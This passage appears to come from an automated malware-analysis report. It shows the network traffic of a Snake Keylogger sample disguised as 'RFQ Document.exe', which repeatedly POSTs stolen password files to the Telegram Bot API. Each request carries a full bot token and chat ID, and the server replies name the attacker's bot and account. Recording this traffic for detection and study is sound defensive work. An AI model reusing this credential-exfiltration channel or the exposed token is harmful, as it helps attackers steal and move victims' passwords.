{"ok":true,"result":{"message_id":12768,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808752,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49792	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:24 UTC	28	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c3f5b542 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:24 UTC	28	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 66 35 62 35 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c3f5b542Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:24 UTC	29	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:24 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:24 UTC	29	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12598,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808704,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
180	192.168.2.4	50001	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:12 UTC	288	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e0a9c32a Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:12 UTC	288	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 30 61 39 63 33 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e0a9c32aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:12 UTC	288	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:12 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:12 UTC	289	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12769,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808752,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
181	192.168.2.4	50002	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:12 UTC	289	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e0c8baa8 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:12 UTC	290	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 30 63 38 62 61 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e0c8baa8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:12 UTC	290	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:12 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:12 UTC	290	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12770,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808752,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
182	192.168.2.4	50003	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:12 UTC	291	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e0e55880 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:12 UTC	291	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 30 65 35 35 38 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e0e55880Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:12 UTC	292	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:12 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:12 UTC	292	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12771,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808752,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
183	192.168.2.4	50004	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:12 UTC	292	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e104567b Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:12 UTC	293	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 30 34 35 36 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e104567bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:13 UTC	293	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:13 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:13 UTC	293	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12772,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808753,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
184	192.168.2.4	50005	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:13 UTC	294	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e11dd96a Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:13 UTC	294	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 31 64 64 39 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e11dd96aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:13 UTC	295	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:13 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:13 UTC	295	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12773,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808753,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
185	192.168.2.4	50006	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:13 UTC	296	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e13b2bab Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:13 UTC	296	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 33 62 32 62 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e13b2babContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:13 UTC	296	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:13 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:13 UTC	297	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12774,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808753,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
186	192.168.2.4	50007	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:13 UTC	297	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e1615165 Host: api.telegram.org Content-Length: 407
